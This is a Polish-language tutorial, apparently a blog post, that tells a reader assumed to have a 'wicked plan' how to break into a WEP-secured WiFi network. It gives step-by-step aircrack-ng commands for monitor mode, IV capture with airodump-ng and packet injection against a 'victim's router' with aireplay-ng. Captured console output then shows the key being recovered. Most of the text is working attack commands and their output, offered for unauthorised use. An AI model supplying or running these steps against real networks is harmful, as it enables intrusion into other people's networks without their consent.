Skoro już trafiłeś na tę stronę to pewnie masz jakiś niecny plan.
To zobacz, jak łatwo jest włamać się do sieci WiFi zabezpieczanej przez WEP.
Zgaduję, że zamierzasz włamać się do sieci WiFi (czyt. łaj-faj), zabezpieczonej protokołem z kluczem WEP, ale nie masz zielonego pojęcia jak się do tego zabrać.
Co musisz mieć przygotowane:
Linux
aircrack-ng
karta WiFi
Przejdź
na konto root.
Wpisz w konsoli:
airmon-ng start <interface> |
Gdzie <inf> to interface sieciowy Twojej karty WLAN. U mnie to wygląda tak:
# airmon-ng start wlan0 Found 6 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 1336 avahi-daemon 1337 avahi-daemon 1342 NetworkManager 1457 wpa_supplicant 32353 dhclient 32426 dhclient Process with PID 32353 (dhclient) is running on interface wlan0 Process with PID 32426 (dhclient) is running on interface wlan1 Interface Chipset Driver wlan0 Atheros ath9k - [phy0] (monitor mode enabled on mon0) wlan1 RTL8187 rtl8187 - [phy1] |
Ty pewnie będziesz miał coś innego na wyjściu po wykonaniu tej komendy, ale nie przejmuj się.
Z powyższego możesz odczytać, że tryb monitor został włączony na inferface mon0, co jest kluczowe do ataku. Sporo osób nie rozumie skąd wziął się ten interface, nie w Twoim komputerze nie pojawiła się magicznie nowa karta sieciowa, chociaż tak, właściwie to pojawiła się, ale jest onawirtualna, utworzona jest na tym samym chipsecie, na którym jest fizyczny interface.
Teraz co musisz zrobić? Wykorzystać ten wirtualny interface do przechwycenia pakietów.
Można tego z łatwością dokonać za pomocą programu, który wchodzi w skład pakietu aircrack-ng, nazwya się on airodump-ng, służy do przechwytywania każdego pakietu w eterze w zasięgu Twojej karty sieciowej. Nie będę się tutaj zagłębiał w to jak działa program ani w jego dokumentację. Musisz wiedzieć tylko co się stanie gdy wpiszesz
airodump-ng -t WEP -c 1 --ivs -w NASA_WEP
Otóż stanie się to:
program będzie działał na interface mon0
będzie wyświetlał tylko te sieci, które są “zabezpieczone” przez WEP
tylko te, które działają na kanale 1
będzie zapisywał pakiety IVS do pliku o nazwie NASA_WEP
Zostawiasz przechwytywanie na jakiś czas ma się zebrać duża liczba w tabeli “#Data“, w niej zapisane są części klucza, który chcesz złamać, im więcej ich masz tym szybciej złamiesz kluczyk.
No dobra, załóżmy że trochę ich już masz. Wejdź w drugą konsolę.
Program aircrack-ng służy do odzyskiwania hasła zapisanego w przechwyconych pakietach. Musisz go odpalić wskazując mu gdzie jest plik z przechwyconymi danymi, żeby mógł zacząć działać.
# aircrack-ng NASA_WEP-01.ivs Opening NASA_WEP-01.ivs Read 1539 packets. # BSSID ESSID Encryption 1 00:04:ED:A3:80:11 NASA WEP (1538 IVs) Choosing first network as target. Opening NASA_WEP-01.ivs Attack will be restarted every 5000 captured ivs. Starting PTW attack with 1538 ivs. Aircrack-ng 1.0 [00:00:04] Tested 166831 keys (got 1538 IVs) KB depth byte(vote) 0 29/ 30 97(2308) 15(2304) D0(2304) BB(2272) 4A(2232) 4B(2232) 1 8/ 12 95(2632) 29(2600) 8E(2600) DE(2600) 65(2564) 7A(2564) 2 12/ 2 19(2560) 27(2488) A6(2488) BC(2488) 2C(2452) 51(2452) 3 32/ 3 D7(2196) 19(2192) 56(2192) 0D(2160) 83(2160) CB(2160) 4 9/ 10 61(2852) DA(2820) 03(2816) 55(2748) 3A(2564) 19(2560) Failed. Next try with 5000 IVs. |
No niestety, minuta przechwytywania pakietów to za mało. Musisz jeszcze chwilę poczekać.
Aircrack-ng 1.0 [00:00:06] Tested 1409955 keys (got 5040 IVs) KB depth byte(vote) 0 95/ 97 E2(5448) 42(5412) 5D(5380) 03(5376) AA(5376) 3E(5372) 1 46/ 1 16(5960) 09(5928) CB(5928) 43(5924) 55(5892) B0(5892) 2 26/ 92 A0(6184) F6(6148) C1(6108) F3(6076) 62(6072) E6(6068) 3 38/ 3 E9(5996) D3(5960) D6(5960) F4(5928) 2F(5924) C4(5924) 4 2/ 8 51(7980) AA(7652) 35(7212) E8(7132) 37(7096) 76(6916) Failed. Next try with 10000 IVs. |
Nie udało się. Mam za mało danych potrzebnych do złamania klucza.
Trzeba pomóc airodumpowi żeby szybciej chwytał te pakiety, można to zrobić za pomocą airepley-ng, służy on do wstrzykiwania pakietów do określonego AP, w celu zebrania większej ilości pakietów z kluczem.
aireplay-ng -3 -b MAC_ADDR_AP mon0
Powyższym poleceniem zaczniesz wstrzykiwać pakiety do routera ofiary. MAC_ADDR_AP weźmiesz z okienka airodump’a, jest to adres MAC docelowej sieci.
Różne poradniki sugerują różne wymagane ilości danych potrzebnych do złamania klucza. Jednak jest to zależne od sieci. Co chwilę można przecież sprawdzać postęp w pracy, nie czekając do tych 20/k/35k/50k IVsów.
Po kilku minutach aircrac-ng zostaje odpalony ponownie, oto efekt jego działania:
# aircrack-ng NASA_WEP-01.ivs Opening NASA_WEP-01.ivs Read 22707 packets. # BSSID ESSID Encryption 1 00:04:ED:A3:80:11 NASA WEP (22706 IVs) Choosing first network as target. Opening NASA_WEP-01.ivs Attack will be restarted every 5000 captured ivs. Starting PTW attack with 22706 ivs. Aircrack-ng 1.0 [00:02:23] Tested 15634 keys (got 25939 IVs) KB depth byte(vote) 0 10/ 12 68(31464) 97(31460) 3C(31424) 6A(31336) 1B(31232) 17(31136) 1 3/ 12 61(32960) F1(32852) 58(32736) BB(32480) 37(32448) 31(32440) 2 1/ 5 78(37040) EE(34204) 32(33476) 92(33212) D5(32780) B1(31676) 3 0/ 2 65(39072) 54(34420) 3A(32792) 71(32560) BE(32492) D7(32188) 4 9/ 11 AC(31544) 0A(31452) C3(31288) 80(31232) C5(31192) 40(31032) KEY FOUND! [ <strong>68:61:78:65:64</strong> ] (ASCII: haxed ) Decrypted correctly: 100% |
Jak widać kluczem do sieci jest: haxed.